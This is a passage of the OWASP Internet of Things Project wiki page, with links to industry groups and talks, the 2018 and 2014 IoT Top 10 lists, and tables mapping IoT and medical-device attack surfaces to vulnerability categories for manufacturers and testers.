Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246187OWASP Internet of Things Project2018-12-19T23:55:49Z<p>Aaron.guzman: /* Contributors */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
Vishruta Rudresh<br />
<br />
Vijayamurugan Pushpanathan <br />
<br />
Aaron Guzman <br />
<br />
Alexander Lafrenz <br />
<br />
Masahiro Murashima <br />
<br />
Charlie Worrell <br />
<br />
José A. Rivas (jarv) <br />
<br />
Pablo Endres <br />
<br />
Ade Yoseman <br />
<br />
Cédric Levy-Bencheotn<br />
<br />
Jason Andress<br />
<br />
Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
